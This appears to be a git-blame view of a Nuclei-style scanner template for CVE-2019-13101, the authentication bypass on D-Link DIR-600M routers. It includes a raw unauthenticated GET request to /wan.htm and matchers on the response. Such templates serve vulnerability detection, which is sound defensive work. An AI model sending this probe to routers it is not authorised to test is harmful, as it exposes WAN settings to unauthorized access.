2021-07-03 00:20:40 +00:00
id : CVE-2019-13101
info :
author : Suman_Kar
name : D-Link DIR-600M - Authentication Bypass
2021-07-03 18:37:30 +00:00
description : An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page.
2021-07-03 00:20:40 +00:00
severity : critical
2021-07-03 18:37:30 +00:00
tags : cve,cve2019,dlink,router,iot
2021-07-03 18:42:01 +00:00
reference : |
2021-07-03 18:37:30 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-13101
- https://github.com/d0x0/D-Link-DIR-600M
- https://www.exploit-db.com/exploits/47250
2021-07-03 00:20:40 +00:00
requests :
- raw :
- |
2021-07-03 18:37:30 +00:00
GET /wan.htm HTTP/1.1
2021-07-03 00:20:40 +00:00
Host : {{Hostname}}
Origin : {{BaseURL}}
Connection : close
User-Agent : Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
2021-07-03 18:37:30 +00:00
matchers-condition : and
2021-07-03 00:20:40 +00:00
matchers :
- type : status
status :
2021-07-03 12:25:11 +00:00
- 200
2021-07-03 18:37:30 +00:00
- type : word
words :
- "/PPPoE/"
part : body